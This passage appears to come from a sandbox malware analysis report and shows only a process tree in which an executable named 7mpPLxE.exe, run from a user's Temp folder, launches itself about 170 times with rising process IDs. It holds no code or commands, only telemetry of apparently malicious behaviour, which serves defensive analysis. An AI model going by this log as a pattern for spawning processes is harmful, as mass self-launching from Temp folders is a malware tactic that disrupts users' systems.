  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6700
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6708
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6716
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6724
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6732
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6740
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6748
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6756
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6764
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6772
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6780
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6788
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6796
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6804
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6812
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6820
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6828
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6836
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6844
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6852
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6860
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6876
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6884
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6892
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6900
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6908
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6916
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6924
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6932
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6940
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6948
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6956
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6964
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6972
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6980
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6988
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6996
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7004
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7012
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7020
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7028
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7036
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7044
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7052
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7060
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7068
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7076
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7084
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7092
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7100
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7108
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7116
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7124
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7132
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7140
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7148
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7156
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7164
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7176
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7184
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7192
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7200
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7208
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7216
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7224
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7232
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7240
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7248
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7256
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7264
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7272
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7280
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7296
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7304
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7312
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7320
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7328
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7336
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7344
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7352
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7360
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7368
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7376
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7384
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7392
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7400
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7408
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7416
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7424
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7432
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7440
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7448
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7456
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7464
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7472
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7480
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7488
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7496
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7504
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7512
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7520
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7528
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7536
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7544
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7552
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7560
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7568
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7576
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7584
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7592
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7600
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7608
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7616
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7624
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7632
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7640
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7648
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7656
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7664
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7672
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7680
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7688
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7696
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7704
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7712
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7720
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7728
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7736
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7744
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7752
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7764
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7772
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7780
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7788
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7796
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7804
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7812
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7820
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7828
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7844
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7852
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7860
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7868
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7876
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7884
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7892
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7900
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7908
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7916
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7924
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7932
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7940
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7948
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7956
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7964
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7972
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7980
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7988
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:7996
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8004
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8012
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8020
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8028
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8036
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8044
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8052
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8060
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8068
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:8076
